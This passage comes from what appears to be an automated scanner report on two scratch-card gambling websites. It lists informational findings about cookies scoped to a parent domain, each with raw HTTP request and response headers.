Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:02 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.199. http://www.scratch2cash.com/Help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Help.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:58 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.200. http://www.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

11.201. http://www.scratch2cash.com/InviteFriend.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/InviteFriend.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:57 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.202. http://www.scratch2cash.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.203. http://www.scratch2cash.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Promotions.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:44:56 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.204. http://www.scratch2cash.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.205. http://www.scratch2cash.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:01 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.206. http://www.scratch2cash.com/Sitemap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Sitemap.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:05 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.207. http://www.scratch2cash.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:00 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.208. http://www.scratch2cash.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratch2cash.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratch2cash.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; __utmz=1.1305546138.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; BO=FM; UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; CountryCode=US; CSITemp=1; __utma=1.1546523937.1305546138.1305546138.1305548289.2; __utmc=1; __utmb=1.2.10.1305548289

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 12:18:35 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:18:35 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Vary: Accept-Encoding
Content-Length: 45693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.209. http://www.scratchcardheaven.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_8=EncryptedUniqueVisitorID=A46351914A3EDB19C738924288C71FD1&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 11:41:48 GMT; path=/
UniqueVisitorID=A46351914A3EDB19C738924288C71FD1; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.scratchcardheaven.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:48 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1154wovrqoflk555jcnrqhat; path=/; HttpOnly
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=A46351914A3EDB19C738924288C71FD1&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 11:41:48 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: UniqueVisitorID=A46351914A3EDB19C738924288C71FD1; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:41:48 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Vary: Accept-Encoding
Content-Length: 44431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.210. http://www.scratchcardheaven.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:27:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:27:01 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.211. http://www.scratchcardheaven.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scratchcardheaven.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
